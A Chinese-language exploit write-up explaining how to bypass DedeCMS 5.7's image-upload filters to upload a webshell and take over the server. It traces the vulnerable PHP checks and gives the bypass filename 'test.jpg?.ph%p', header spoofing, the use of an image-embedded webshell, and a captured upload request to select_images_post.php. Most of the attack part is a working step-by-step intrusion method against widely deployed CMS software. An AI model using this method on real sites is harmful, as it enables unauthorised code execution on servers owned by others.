0x01 吹牛逼

官方下载最新安装包http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-UTF8-SP2.tar.gz

织梦5.7会员中心，由于为了安全性问题，限制了注册会员在会员中心发布信息的时候上传图片，但是管理员登录会员中心发布信息的时候上传图片却不受影响。那该如何解决呢？下面我们来说明一下具体的解决方案。 首先，具体的问题为，注册会员点击图片上传，预览选择好本地图后点击上传到服务器上，会出现如下所示结果： 图片上传失败，并无像正常上传图片后提交按钮跳转到相应的图像属性界面上，仅在当前窗口上弹出一个滚动条，上面的滚动条里面提示为“提示：需输入后台管理目录才能登陆”，但因滚动条高度受限制了所以我们看不到提示。想要查看具体的提升信息的话，请点击向下的滚动条一直往下，即可出现文字提示。如图： 现在知道具体原因后就容易解决问题了，直接搜索织梦网站程序文件夹下的全部包含“提示：需输入后台管理目录才能登陆“的文件，找到include/dialog/config.php文件。其中有段代码

//检验用户登录状态$cuserLogin= new userLogin();if($cuserLogin->getUserID() <=0)  {if(emptyempty($adminDirHand))  {  ShowMsg( 提示：需输入后台管理目录才能登录请输入后台管理目录名： width:120px;/> ,  javascript:; );  exit();  }  $gurl =  ../../{$adminDirHand}/login.php?gotopage= .urlencode($dedeNowurl);  echo  location=$gurl; ;exit();  }

所以说dedecms5.7要上传图片的话，必须按照上面做，我们这里是按照这个规则，认为管理员开启了会员上传图片的权限，低于5.7的只要开启会员中心即可

windows环境需要经过处理的图片马，需要处理的图片马是因为（绕过文件后缀名检测以后，php-GD对图片的渲染和处理会导致webshell代码错位失效，所以需要特殊的图片马进行绕过,图片马的制作）

漏洞文件：include\dialog\select_images_post.php

先看一下它引入的包，为了后期更好的读通代码。

位置：include\dialog\config.php

require_once(dirname(__FILE__)."/../common.inc.php");

继续跟踪文件

位置：include\common.inc.php

//转换上传的文件相关的变量及安全处理、并引用前台通用的上传函数if($_FILES){require_once(DEDEINC.'/uploadsafe.inc.php');}

经过这个文件以后，终于可以看到一个函数了，而这个函数上面写到了作用，但它还有一个功能就是过滤掉一些非法函数，跟进去看看。

可以看到include\uploadsafe.inc.php下

$cfg_not_allowall ="php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml";

禁止上传的类型，采用的是黑名单的方式。

再往下看

$imtypes= array    ("image/pjpeg","image/jpeg","image/gif","image/png","image/xpng","image/wbmp","image/bmp");if(in_array(strtolower(trim(${$_key.'_type'})),$imtypes))    {$image_dd= @getimagesize($$_key);if(!is_array($image_dd))        {exit('Upload filetype not allow !');        }    }

这里可以看到它判断了图片上传的类型，这个绕过只需要修改http头就可以了。

头疼的是getimagesize这个函数，这个函数的作用是获取图片大小及相关信息。

再看一下上面的select_images_post.php文件

$imgfile_name = trim(preg_replace("#[\r\n\t\*\%\\\/\?><\|\":]{1,}#", '',$imgfile_name));

利用到了正则替换了。

如果在那个地方上传，http://xxx.com/xxx.jpg这样的话就会允许，但是xxx.php这样就会变成失败。

由于上面写到了正则，所以绕过的方法也很简单只要不等于黑名单的内容即可。比如http://xxxx.com/xxx.jpg?.ph%p这样等等！

往下面再看一行代码

if(!preg_match("#\.(".$cfg_imgtype.")#i",$imgfile_name))

这里的代码写的不严谨，只验证了一次黑名单，而构造的图片名字是test.jpg?.ph%p

0x02 漏洞测试

环境：Linux+phpstudy

上传图片抓包

POST/dedecms/include/dialog/select_images_post.php?CKEditor=body&CKEditorFuncNum=2&langCode=zh-cn HTTP/1.1Host: *******Content-Length:42080

Cache-Control:max-age=0

Origin:http://*******

Upgrade-Insecure-Requests:1

User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36

Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryZNrPDjZXsDjHXAYJ

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Referer: http://*****/dedecms/dede/archives_add.php?channelid=6&cid=0Accept-Encoding: gzip, deflateAccept-Language:zh-CN,zh;q=0.8

Cookie:***

Connection:close------WebKitFormBoundaryZNrPDjZXsDjHXAYJContent-Disposition:form-data; name="upload"; filename="test.jpg"Content-Type:image/jpeg*******------WebKitFormBoundaryZNrPDjZXsDjHXAYJ--

然后把filename修改一下

然后访问路径得

0x03 感谢

本文感谢wind、phpoop两人的协助代码分析！为什么说后台可以getshell，因为前台编辑器是调用后台的编辑器，所以只需要上文提到注释掉了前台也可以getshell！